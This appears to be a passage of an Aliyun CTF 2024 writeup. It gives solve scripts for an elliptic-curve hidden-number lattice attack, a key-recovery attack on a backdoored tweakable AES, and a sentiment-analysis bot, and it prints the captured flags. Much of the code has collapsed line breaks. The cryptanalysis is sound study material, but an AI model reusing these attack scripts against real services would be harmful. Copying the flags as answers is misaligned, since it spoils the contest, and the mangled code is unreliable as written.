leak1 = send_point(r,pk_B+1*pk_G)leak_1= send_point(r,pk_B-1*pk_G)leak1_= int(leak1)+int(leak_1)Q1x   = int((pk_A * 1)[0])left1 = (leak1_ + mmm*(e1+B)) * (gabx - Q1x)**2right1= 2*(a*(gabx+Q1x)+2*b+Q1x*gabx*(Q1x+gabx))F1    = left1 - right1F1   *= int(inverse_mod(F1.coefficients()[0],p))
leak2 = send_point(r,pk_B+2*pk_G) leak_2= send_point(r,pk_B-2*pk_G) # DH(Alice_sk, -2*G + Bob_pk) % m leak2_= int(leak2)+int(leak_2)Q2x   = int((pk_A * 2)[0])left2 = (leak2_ + mmm*(e2+B)) * (gabx - Q2x)**2right2= 2*(a*(gabx+Q2x)+2*b+Q2x*gabx*(Q2x+gabx))F2    = left2 - right2F2   *= int(inverse_mod(F2.coefficients()[0],p))
leak3 = send_point(r,pk_B+3*pk_G)#  % m leak_3 = send_point(r,pk_B-3*pk_G) #DH(Alice_sk, -3*G + Bob_pk) % m leak3_= int(leak3)+int(leak_3)Q3x   = int((pk_A * 3)[0])left3 = (leak3_ + mmm*(e3+B)) * (gabx - Q3x)**2right3= 2*(a*(gabx+Q3x)+2*b+Q3x*gabx*(Q3x+gabx))F3    = left3 - right3F3   *= int(inverse_mod(F3.coefficients()[0],p))
leak4 = send_point(r,pk_B+4*pk_G) % m leak_4 = send_point(r, pk_B-4*pk_G) % m leak4_= int(leak4)+int(leak_4)Q4x   = int((pk_A * 4)[0])left4 = (leak4_ + mmm*(e4+B)) * (gabx - Q4x)**2right4= 2*(a*(gabx+Q4x)+2*b+Q4x*gabx*(Q4x+gabx))F4    = left4 - right4F4   *= int(inverse_mod(F4.coefficients()[0],p))
leak5 = send_point(r,pk_B+5*pk_G) #% m leak_5 = send_point(r,pk_B-5*pk_G) #ice_sk, -5*G + Bob_pk) % m leak5_= int(leak5)+int(leak_5)Q5x   = int((pk_A * 5)[0])left5 = (leak5_ + mmm*(e5+B)) * (gabx - Q5x)**2right5= 2*(a*(gabx+Q5x)+2*b+Q5x*gabx*(Q5x+gabx))F5    = left5 - right5F5   *= int(inverse_mod(F5.coefficients()[0],p))
#(n,d,t)=(5,2,1)#(n,d,t)=(5,3,2)#(n,d,t)=(5,3,2)def find_root(p,n,d,t,polys,bounds):    A,B,C,D,E=[],[],[],[],[]    for i in range(n):        polys[i]=polys[i].change_ring(ZZ)        __,cc,ee,bb,dd,aa=polys[i].coefficients()        A.append(aa)        B.append(bb)        C.append(cc)        D.append(dd)        E.append(ee)        R=polys[0].parent()    x=R.gens()        G = Sequence([],R)        # case l=0    for i in range(2*d):        G.append(p**d*x[0]**i)        # case l=1    for i in range(1,n+1):        G.append(p**d*x[i])        G.append(p**d*x[0]*x[i])        # case l=1    for i in range(0,n):        for j in range(2,2*d):            G.append(p**(d-1)*x[0]**(j-2)*polys[i]%(p**d))
   # case 1<l<=d    def work(choose):        l=len(choose)        RR=PolynomialRing(Zmod(p**(l-1)),1,'xx')        xx=RR.gen()        polys_l=[]        for i in choose:            polys_l.append(xx**2+E[i]*xx+D[i])        M=matrix(Zmod(p**(l-1)),2*l)        for i in range(l):            tmp=RR(1)            for j in range(l):                if(i!=j):                    tmp*=polys_l[j]            # print(tmp)            # print(tmp.coefficients())            tmp=tmp.coefficients()[::-1]            M[i]=tmp+[0]            M[i+l]=[0]+tmp        # print(M)        W=M.inverse()        w=W.change_ring(ZZ)        for i0 in range(2*l):            tmp=0            for (u,ui) in enumerate(choose):                tp=x[ui+1]                for vi in choose:                    if(vi!=ui):                        tp*=polys[vi]                tmp+=(w[i0,u]+w[i0,u+l]*x[0])*tp            G.append(p**(d-l+1)*tmp%(p**d))        tp=1        for i in choose:            tp*=polys[i]        for i0 in range(2*l,2*d):            G.append(p**(d-l)*tp*x[0]**(i0-2*l)%(p**d))
   #case l=d+1    def spec(choose):        l=len(choose)        RR=PolynomialRing(Zmod(p**(l-1)),1,"xx")        xx=RR.gen()        polys_l=[]        for i in choose:            polys_l.append(xx**2+E[i]*xx+D[i])        M=matrix(Zmod(p**(l-1)),2*l)        for i in range(l):            tmp=RR(1)            for j in range(l):                if(i!=j):                    tmp*=polys_l[j]            tmp=tmp.coefficients()[::-1]            M[i]=tmp+[0]            M[i+l]=[0]+tmp        W=M.inverse()        w=W.change_ring(ZZ)        for i0 in range(0,t+1):            H=0            for (u,ui) in enumerate(choose):                th=x[ui+1]                for vi in choose:                    if(vi!=ui):                        th*=polys[vi]                H+=(w[i0,u]+w[i0,u+l]*x[0])*th            J=0            for (u,ui) in enumerate(choose):                tj=C[ui]                for vi in choose:                    if(vi!=ui):                        tj*=polys[vi]                J+=(w[i0,u]+w[i0,u+l]*x[0])*tj            K=0            for (u,ui) in enumerate(choose):                tk=B[ui]-C[ui]*E[ui]                for vi in choose:                    if(vi!=ui):                        tk*=polys[vi]                K+=w[i0,u+l]*tk            # print((H+J+K)%(p**d))            G.append((H+J+K)%(p**d))
   def dfs(i,l,choose):        if(i==n):            if(l==0):                if(len(choose)<=d):                    work(choose)                else:                    spec(choose)            return        if(l>0):            dfs(i+1,l-1,choose+[i])        dfs(i+1,l,choose)                for l in range(2,d+2):        dfs(0,l,[])
   B, monomials = G.coefficient_matrix()    monomials = vector(monomials)
   factors = [monomial(*bounds) for monomial in monomials]    for i, factor in enumerate(factors):        B.rescale_col(i, factor)    # B=B.dense_matrix().LLL()    B = flatter(B.dense_matrix())    B = B.change_ring(QQ)    for i, factor in enumerate(factors):        B.rescale_col(i, 1/factor)    print(polys[0].parent())    H = Sequence([], polys[0].parent().change_ring(QQ))    for h in filter(None, B*monomials):        H.append(h)    return H
F1 = F1.change_ring(ZZ)F2 = F2.change_ring(ZZ)F3 = F3.change_ring(ZZ)F4 = F4.change_ring(ZZ)F5 = F5.change_ring(ZZ)
polys = [F1,F2,F3,F4,F5]bounds = [B0] + [B for _ in range(5)]
n,d,t = 5,3,2ret = find_root(p,n,d,t,polys,bounds)mypol = []for poli in ret:    mypol.append(poli)print(len(mypol))def find_roots_CRT(R,Hs,bounds):    if bounds == None:        print("[-] CRT-find_roots need bounds")        return []    P = 2    M = 1
   ALERT = True    vars = R.gens()    k = len(vars)    Hs = [h.change_ring(ZZ) for h in Hs]    maxBound = max(bounds)*4    remainders = [[] for _ in range(k)]    modulus = []    times = 0    Maxtimes = 100
   while M < maxBound and times < Maxtimes:        P = next_prime(P)        R = R.change_ring(GF(P))        solutions = []        for i in range(len(Hs),0,-1):            I = R * (Hs[:i])            I = Ideal(I.groebner_basis())            if I.dimension() == 0:                solutions = I.variety()                if len(solutions) != 0:                    if len(solutions) > 1:                        if ALERT:                            ALERT = False                            print("[!] Find more than one roots! The result may goes wrong. ")                    else:                        solutions = [int(solutions[0][var]) for var in vars ]                        for remainder,solution in zip(remainders,solutions):                            remainder.append(solution)                        modulus.append(P)                        M *= P                        break
       if solutions == []:            times += 1    if times != Maxtimes:        return list(set(tuple(int(crt(remainders[i], modulus)) for i in range(k)))),M    else:        return []print("START my_ret")ret,M=find_roots_CRT(mypol[0].parent(),mypol[:36],bounds)
for i in range(len(ret)):    if(ret[i]>abs(ret[i]-M)):        ret[i]-=M
for e0 in ret:    e0=(e0+B0)*m+leak0    key = sha256(str(e0).encode()).digest()    sign=AES.new(key,AES.MODE_ECB).decrypt(enc_sign)    if(sign.startswith(b'Secret sign is ')):        sign=sign.split(b'Secret sign is ')[-1]        r.sendline(AES.new(key,AES.MODE_ECB).encrypt(sign[:-1]).hex().encode())        print(r.recvall())        # aliyunctf{ECHNP_is_not_as_difficult_as_I_thought}

Doctored Dobbertin v2

由于tweak每轮拓展密钥round_tweaks只有三四列不为0,通过调整tweak,使得round_tweaks每轮三四列密钥与const异或后分别等于const一二列。即round_tweaks[3][i]^const[3][i] = const[1][i], round_tweaks[4][i]^const[4][i] = const[2][i], i=1,…4,按照附件,第一个索引代表列。

这样保持除最后一轮外,每轮加密后的密文第一、二列分别等于第三、四列。而在最后一轮的拓展密钥的一二列为0,故p[1]^round_keys[-1][3] = p[3], p[2]^round_keys[-1][4] = p[4],p是最终密文。从而可以得到round_keys[-1],也就是八个和key有关的字节。


import os, sysfrom sage.crypto.sbox import SBoxclass TAES_Oracle:    rounds = 10    keysize = 10
   s_box = (    0x41, 0x2E, 0x6A, 0x26, 0x74, 0xD6, 0xB9, 0x6D, 0x27, 0x39, 0x63, 0xEC, 0xD5, 0xDC, 0x2C, 0x70,    0xA6, 0xC1, 0x58, 0xA7, 0x0C, 0x5A, 0xCE, 0x02, 0xB5, 0x4A, 0xF1, 0xDD, 0xD3, 0x7C, 0xBF, 0xFE,    0x3A, 0xE4, 0x67, 0xCB, 0x60, 0x37, 0x5C, 0x93, 0xD1, 0x77, 0xAF, 0xAB, 0x38, 0xBC, 0xE1, 0x17,    0x35, 0x07, 0xB7, 0xBA, 0xB6, 0xB0, 0x4E, 0xB1, 0x69, 0x20, 0xCF, 0xEF, 0x9A, 0xEB, 0xFD, 0x32,    0xF0, 0x13, 0x00, 0xE0, 0x18, 0x9C, 0x52, 0x50, 0x4D, 0x24, 0x9B, 0xE2, 0x36, 0x2A, 0xAD, 0x59,    0xFB, 0xB4, 0x19, 0xF4, 0x48, 0xF7, 0x6B, 0x6C, 0x7B, 0x81, 0x3F, 0xD0, 0x68, 0x1A, 0x5D, 0x8A,    0x4C, 0xD8, 0xAE, 0xD7, 0x2B, 0x2D, 0x9D, 0xFA, 0x97, 0x1B, 0x43, 0xAA, 0x06, 0x14, 0x10, 0xD2,    0x28, 0x9E, 0xB8, 0x78, 0x5B, 0x85, 0xA4, 0x7D, 0x23, 0x92, 0x25, 0x46, 0x62, 0xA3, 0x42, 0x0D,    0x09, 0xE3, 0x83, 0x0F, 0xF6, 0x7F, 0x31, 0x6F, 0xC3, 0xDE, 0x79, 0x99, 0x03, 0x22, 0xA9, 0xB3,    0x1F, 0x7A, 0x01, 0x0E, 0xDB, 0xDF, 0xE6, 0x0A, 0x3B, 0x57, 0xCC, 0xEA, 0x30, 0x98, 0xDA, 0x16,    0x2F, 0x3E, 0x29, 0x54, 0x87, 0x8D, 0x72, 0x40, 0x3D, 0xFC, 0x66, 0xCD, 0xE7, 0x84, 0x7E, 0xC6,    0xA8, 0xAC, 0x51, 0x65, 0x71, 0x08, 0x33, 0x6E, 0x1D, 0x80, 0x55, 0xBB, 0x5E, 0x61, 0xC2, 0xF2,    0x76, 0x91, 0xF8, 0x45, 0x64, 0xFF, 0x86, 0x95, 0xEE, 0x1C, 0xE9, 0x8B, 0x12, 0x34, 0xC4, 0x8C,    0x56, 0x90, 0x5F, 0x82, 0xA2, 0x53, 0x96, 0x73, 0xBE, 0x88, 0x47, 0x4B, 0x15, 0xBD, 0xC5, 0x3C,    0xD9, 0xCA, 0xE8, 0xF9, 0x4F, 0xA0, 0xC0, 0x04, 0xB2, 0x9F, 0x11, 0x21, 0xA1, 0x0B, 0x44, 0xE5,    0x89, 0x8F, 0x75, 0x1E, 0xC9, 0x94, 0x8E, 0xC8, 0x49, 0xF5, 0x05, 0xD4, 0xED, 0xF3, 0xC7, 0xA5,    )    Constants = [        0x4d7f6272fa2b30231ff271b11265b29e,        0x87590fe9a805a3feefc710abdc104f51,        0xcbcae366693452003b30f0c6c6512d51,        0x46fa1c00c058e3929667197beba269a6,        0x0377c657fdc1b7d6eb5c1f08299013d8,        0xdf45e38398bcbc33818f1d21159cca89,        0x254a53e8a055e79672bf4781a3e0371b,        0x121a7c76c50df79fbab9346b6b899dce,        0x1381be9c3e73304d09c153e81d21bd5e,        0xcdc6bfdf5d354c1fcaad1ec5c95dd200    ]            def __init__(self):        self.key = bytearray(os.urandom(self.keysize))        self.InvSbox = SBox(s_box).inverse()    def _sub_bytes(self, s):        for i in range(4):            for j in range(4):                s[i][j] = self.s_box[s[i][j]]
   def __inv_sub_bytes(self, s):        for i in range(4):            for j in range(4):                s[i][j] = self.InvSbox[s[i][j]]                    def _shift_rows(self, s):        s[0][1], s[1][1], s[2][1], s[3][1] = s[1][1], s[2][1], s[3][1], s[0][1]        s[0][2], s[1][2], s[2][2], s[3][2] = s[2][2], s[3][2], s[0][2], s[1][2]        s[0][3], s[1][3], s[2][3], s[3][3] = s[3][3], s[0][3], s[1][3], s[2][3]
   def __inv_shift_rows(self, s):        s[0][1], s[1][1], s[2][1], s[3][1] = s[3][1], s[0][1], s[1][1], s[2][1]        s[0][2], s[1][2], s[2][2], s[3][2] = s[2][2], s[3][2], s[0][2], s[1][2]        s[0][3], s[1][3], s[2][3], s[3][3] = s[1][3], s[2][3], s[3][3], s[0][3]
   def _add_round_key(self, s, k):        for i in range(4):            for j in range(4):                s[i][j] ^= k[i][j]
   _xtime = lambda self, a: (((a << 1) ^ 0x1B) & 0xFF) if (a & 0x80) else (a << 1)
   def _mix_single_column(self, a):        # see Sec 4.1.2 in The Design of Rijndael        t = a[0] ^ a[1] ^ a[2] ^ a[3]        u = a[0]        a[0] ^= t ^ self._xtime(a[0] ^ a[1])        a[1] ^= t ^ self._xtime(a[1] ^ a[2])        a[2] ^= t ^ self._xtime(a[2] ^ a[3])        a[3] ^= t ^ self._xtime(a[3] ^ u)
   def _mix_columns(self, s):        for i in range(4):            self._mix_single_column(s[i])
   def __inv_mix_columns(self, s):        # see Sec 4.1.3 in The Design of Rijndael        for i in range(4):            u = self._xtime(self._xtime(s[i][0] ^ s[i][2]))            v = self._xtime(self._xtime(s[i][1] ^ s[i][3]))            s[i][0] ^= u            s[i][1] ^= v            s[i][2] ^= u            s[i][3] ^= v
   def _bytes2matrix(self, text):        """ Converts a 16-byte array into a 4x4 matrix.  """        return [list(text[i:i+4]) for i in range(0, len(text), 4)]
   def _matrix2bytes(self, matrix):        """ Converts a 4x4 matrix into a 16-byte array.  """        return bytes(sum(matrix, []))
   def _expand_key(self, key):        perm = [8, 1, 7, 2, 0, 3, 4, 9, 5, 6]        key_bytes = list(key)        assert(len(key_bytes) == 10)        round_keys = []
       for i in range(self.rounds):            rk = []            rk.append( [key_bytes[i] for i in range(4)] )            rk.append( [key_bytes[i] for i in range(4, 8)] )            rk.append( [key_bytes[i] for i in range(4)] )            rk.append( [key_bytes[i] for i in range(4, 8)] )
           p_key_bytes = [0] * 10
           for p in range(10):                p_key_bytes[perm[p]] = key_bytes[p]
           key_bytes = p_key_bytes            key_bytes[0] = self.s_box[key_bytes[0]]
       rk = []        rk.append( [0]*4 )        rk.append( [0]*4 )        rk.append( [key_bytes[i] for i in range(4)] )        rk.append( [key_bytes[i] for i in range(4, 8)] )        round_keys.append(rk)                return round_keys
   def _expand_tweak(self, tweak_bits):        assert(len(tweak_bits) == 128)        round_tweaks = []
       for i in range(self.rounds):            rt = [bytes(4), bytes(4)]            tweak2 = []            tweak3 = []
           for j in range(4):                tweak2_byte = ""                tweak3_byte = ""                for b in range(8):                    tweak2_byte += tweak_bits[ (11*(i+1) + (j*8) + b) % 128 ]                    tweak3_byte += tweak_bits[ (11*(i+1) + 32 + (j*8) + b) % 128 ]
               tweak2.append( int(tweak2_byte, 2) )                tweak3.append( int(tweak3_byte, 2) )
           rt.append(bytes(tweak2))            rt.append(bytes(tweak3))
       return round_tweaks
   def _add_constants(self, p, r):
       for col in range(4):            for row in range(4):                con = (self.Constants[r] >> (((3-col)*4 + (3-row)) * 8)) & ((1<<8) - 1)
               p[col][row] ^= con
   def encrypt(self, plaintext, tweak):        assert len(plaintext) == 16        p = self._bytes2matrix(plaintext)        tweak = bin(int(tweak, 16))[2:].zfill(128)  # 16bytes        round_keys = self._expand_key(self.key)        round_tweaks = self._expand_tweak(tweak)
       for i in range(self.rounds - 1):            self._add_round_key(p, round_keys[i])            self._add_round_key(p, round_tweaks[i])            self._add_constants(p, i)
           self._sub_bytes(p)            self._shift_rows(p)            self._mix_columns(p)
       self._add_round_key(p, round_keys[self.rounds-1])        self._add_round_key(p, round_tweaks[self.rounds-1])        self._add_constants(p, self.rounds-1)        self._sub_bytes(p)        self._shift_rows(p)        self._add_round_key(p, round_keys[self.rounds])
       return self._matrix2bytes(p)
   def decrypt(self, ciphertext, tweak):        p = self._bytes2matrix(ciphertext)        tweak = bin(int(tweak, 16))[2:].zfill(128)  # 16bytes        round_keys = self._expand_key(self.key)        round_tweaks = self._expand_tweak(tweak)
       self._add_round_key(p, round_keys[self.rounds])        self.__inv_shift_rows(p)        self.__inv_sub_bytes(p)        self._add_constants(p, self.rounds-1)        self._add_round_key(p, round_tweaks[self.rounds-1])        self._add_round_key(p, round_keys[self.rounds-1])
       for i in range(8, -1, -1):            self.__inv_mix_columns(p)            self.__inv_shift_rows(p)            self.__inv_sub_bytes(p)            self._add_constants(p, i)            self._add_round_key(p, round_tweaks[i])            self._add_round_key(p, round_keys[i])
       return self._matrix2bytes(p)
Constants = [        0x4d7f6272fa2b30231ff271b11265b29e,        0x87590fe9a805a3feefc710abdc104f51,        0xcbcae366693452003b30f0c6c6512d51,        0x46fa1c00c058e3929667197beba269a6,        0x0377c657fdc1b7d6eb5c1f08299013d8,        0xdf45e38398bcbc33818f1d21159cca89,        0x254a53e8a055e79672bf4781a3e0371b,        0x121a7c76c50df79fbab9346b6b899dce,        0x1381be9c3e73304d09c153e81d21bd5e,        0xcdc6bfdf5d354c1fcaad1ec5c95dd200    ]const_10round = []for r in range(10):    tmp_round = []    for col in range(0, 4):        tmp = []        for row in range(4):            con = (Constants[r] >> (((3-col)*4 + (3-row)) * 8)) & ((1<<8) - 1)            tmp.append(con)        tmp_round.append(tmp)    const_10round.append(tmp_round)tk_bits = [0]*128for r in range(10):    rt = const_10round[r]    tk0 = [i for i in bytearray(rt[0])]    tk1 = [i for i in bytearray(rt[1])]    tk2 = [i for i in bytearray(rt[2])]    tk3 = [i for i in bytearray(rt[3])]    for j in range(4):        tk2_byte = bin(tk2[j]^tk0[j])[2:].zfill(8)        tk3_byte = bin(tk3[j]^tk1[j])[2:].zfill(8)        for b in range(8):            if tk_bits[(11*(r+1) + (j*8) + b) % 128 ] == 0:                tk_bits[ (11*(r+1) + (j*8) + b) % 128 ] = tk2_byte[b]            else:                if tk_bits[(11*(r+1) + (j*8) + b) % 128 ] != tk2_byte[b]:                    print("Collision")            if tk_bits[(11*(r+1) + 32 + (j*8) + b) % 128 ]== 0:                tk_bits[ (11*(r+1) + 32 + (j*8) + b) % 128 ] = tk3_byte[b]            else:                if tk_bits[(11*(r+1) + 32 + (j*8) + b) % 128 ] != tk3_byte[b]:                    print("Collision")
tk_bits = ''.join(tk_bits)tweak = hex(int(tk_bits, 2))
from pwn import *from hashlib import sha256from string import ascii_letters, ascii_lowercase, digits
for _ in range(256):    r = remote('crypto2.aliyunctf.com', 13337)    def proof(r):        text=r.recvline()        print(text)        tmp=text.split(b'XXXX + ')[-1]        suf,val=tmp.strip().split(b') == ')        suf=suf.decode()        val=val.decode()        poss=ascii_letters + digits        for a in poss:            for b in poss:                for c in poss:                    for d in poss:                        digest = sha256((a+b+c+d+suf).encode()).hexdigest()                        if(digest==val):                            r.sendline((a+b+c+d).encode())                            return
   instance = TAES_Oracle()    sbox = SBox(instance.s_box)    Sinv = sbox.inverse()
   proof(r)            r.recvuntil(b'Enter your challenge: >')    m = b'x00' * 16    r.sendline(m.hex().encode())    r.recvuntil(b'Enter your challenge tweak: >')    r.sendline(tweak.encode())    enc = bytes.fromhex(r.recvline().strip().decode())    r.recvuntil(b'You got a challenge: ')    challenge = bytes.fromhex(r.recvline().strip().decode())    r.recvuntil(b'Tweak used:')    init_tweak = r.recvline().strip().decode()    r.recvuntil(b'Enter your guess: >')
   enc_matrix = instance._bytes2matrix(enc)    key9 = xor(enc_matrix[0], enc_matrix[2])    key10 = xor(enc_matrix[1], enc_matrix[3])
   k3 = key9[:]    k4 = key10[:]    keys = [None, k3[1], Sinv[k4[3]], Sinv[k3[2]], Sinv[Sinv[k3[0]]], Sinv[k3[3]], Sinv[k4[0]], None, Sinv[k4[1]], Sinv[k4[2]]]    is_True = False    for i in range(128):        if is_True:            break        for j in range(128):            keys[0] = i            keys[7] = j            instance.key = bytes(keys)            enc2 = instance.encrypt(m, tweak)            if enc2 == enc:                print("Found key")                keys = bytes(keys)                is_True = True                break    instance.key = keys    token = instance.decrypt(challenge, init_tweak)    r.sendline(token.hex().encode())    r.recvline()    try:        r.recvline()    except:        r.close()        continue# aliyunctf{8ackd00r_15_ev3rywh3re}



# pip install nltk# import nltk# nltk.download('vader_lexicon')# nltk.download('punkt')# nltk.download('stopwords')

import hashlibimport itertoolsfrom pwn import *from string import digits, ascii_letters, punctuationfrom nltk.sentiment.vader import SentimentIntensityAnalyzerfrom nltk.corpus import stopwordsfrom nltk.tokenize import word_tokenizefrom nltk.stem import PorterStemmer
def preprocess_text(text):    # 分词    words = word_tokenize(text)
   # 去除停用词和非字母字符    stop_words = set(stopwords.words('english'))    words = [word for word in words if word.isalpha() and word not in stop_words]
   # 词干提取    ps = PorterStemmer()    words = [ps.stem(word) for word in words]
   # 返回处理后的词汇列表    sen = ','.join(words)    return sen
def sentiment_analysis(r, pos, neg, neu):    sentence = r.recvline().decode()    sentiment = sia.polarity_scores(sentence)    print('[+]The compound is :{}'.format(sentiment['compound']))    if sentiment['compound'] > 0.3:        r.sendlineafter(b'answer:', pos)    elif sentiment['compound'] < -0.15:        r.sendlineafter(b'answer:', neg)    else:        r.sendlineafter(b'answer:', neu)
def proof_work(prefix:bytes,output:str):    s = bytes([i for i in range(97,97+26)])+b"0123456789"    for a1 in s:        for a2 in s:            for a3 in s:                for a4 in s:                    t = bytes([a1,a2,a3,a4])                    m = prefix+t                    if hashlib.sha256(m).hexdigest()==output:                        return twhile True:        try:            sia = SentimentIntensityAnalyzer()            r = remote("misc0.aliyunctf.com", 9999)            message = r.recvline().decode()            context.log_level = 'debug'            print(message)
           alpha_bet = digits + ascii_letters + punctuation            strlist = itertools.product(alpha_bet, repeat=4)
           sha26 = message.split('=')[1].strip()            start = message.find('"')+1            end = message.find('"', start)            head = message[start:end]
                       ans = proof_work(head.encode(),sha26)            # r.interactive()            r.sendline(ans)            r.sendlineafter(b'n)', b'n')
           pos = 'positive'.encode()            neg = 'negative'.encode()            neu = 'neutral'.encode()
           r.sendlineafter(b'n)', b'y')            for i in range(15):                sentiment_analysis(r, pos, neg, neu)
           break  # 如果执行成功,跳出无限循环        except EOFError:            r.close()            continue


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阿里云CTF 2024 writeup
阿里云CTF 2024 writeup
阿里云CTF 2024 writeup


阿里云CTF 2024 writeup


阿里云CTF 2024 writeup


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